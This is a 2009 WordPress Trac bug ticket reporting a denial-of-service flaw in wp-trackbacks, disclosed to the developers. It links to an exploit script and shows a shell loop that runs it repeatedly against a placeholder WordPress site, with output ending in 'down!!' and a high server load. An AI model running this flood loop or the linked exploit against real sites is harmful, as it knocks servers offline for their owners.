[wp-trac] [WordPress Trac] #10980: DoS in wp-trackbacks

WordPress Trac wp-trac at lists.automattic.com
Mon Oct 19 19:25:17 UTC 2009


#10980: DoS in wp-trackbacks
-----------------------------+----------------------------------------------
 Reporter:  gomex            |       Owner:            
     Type:  defect (bug)     |      Status:  new       
 Priority:  highest omg bbq  |   Milestone:  Unassigned
Component:  General          |     Version:            
 Severity:  major            |    Keywords:            
-----------------------------+----------------------------------------------
 The exploit: http://codes.zerial.org/php/wp-trackbacks_dos.phps

 Execution:

 $ while /bin/true; do php test.php http://target.bom/wordpress; done
 hit!
 hit!
 hit!
 hit!
 hit!
 hit!
 hit!
 hit!
 hit!
 hit!

 Notice: fputs(): send of 8192 bytes failed with errno=11 Resource
 temporarily unavailable

 down!!

 Load average: 22.07, 15.18, 8.58 (on target server)

-- 
Ticket URL: <http://core.trac.wordpress.org/ticket/10980>
WordPress Trac <http://core.trac.wordpress.org/>
WordPress blogging software

